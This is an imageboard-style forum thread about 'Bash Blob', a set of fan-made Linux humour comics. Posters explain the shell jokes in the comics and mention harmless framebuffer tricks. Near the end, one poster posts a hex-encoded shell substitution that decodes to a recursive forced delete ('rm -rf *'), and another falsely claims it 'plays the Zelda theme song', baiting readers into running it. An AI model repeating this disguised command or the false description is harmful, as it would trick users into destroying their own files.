Bash Blob

Any official source on these comics? Googling brings up nothing relevant.

There's nothing official about it. Pic related was the original, as far as I know, but it was a one-off. The rest are random anons riffing on the concept. I saw some (not the original) in a Sup Forums humor thread and I liked the idea, so I started a thread and made a bunch of them, with other anons contributing as well. I think most of them are from that thread.

>tfw Sup Forums makes something original
feels cozy man

Template if you want it

Also, some kind user made a hi-res version of the character

>tfw you helped jump-start a meme
also dumping some un-watermarked ones

>What's happening here?
He's cd'ing out of root

I think it's meant to show the blob as the CPU

ty for making my monday less shitty.

Is that actually possible?

More like he's escaping from the CPU and squeezing out from under the cooler

Idunno, I don't use linux. Someone else might have some input on this.

If you cd .. in /, you'll just end up in / again.

those are actually funny, what happened? why is Sup Forums funny all of the sudden?

no you won't.

t. someone who hasn't tried it

I lol'd

What should those handsets mean?

I'd use this instead:
cat /dev/urandom > /dev/fb0
(only works on a login shell, e.g. ctrl+alt+f2)

Interesting. I didn't know you could do that.

They're ssh'ing from one machine to the next, it signifies the connection/relay between the hosts. In the real world you would use the LocalForward config option instead of doing it manually for each host.

inspired to make a fb game now
thanks user

Someone make a new comic with the first box this
$(echo '726d202d7266202a' | xxd -r -p )

And last box with the blob dressed up as link playing his instrument

If you're going to do something like that, using DRM/KMS would probably be a better idea.
It's not actually that hard to do.

It's the command that plays the Zelda theme song

these are awesome

Code with karlie

That's the joke.
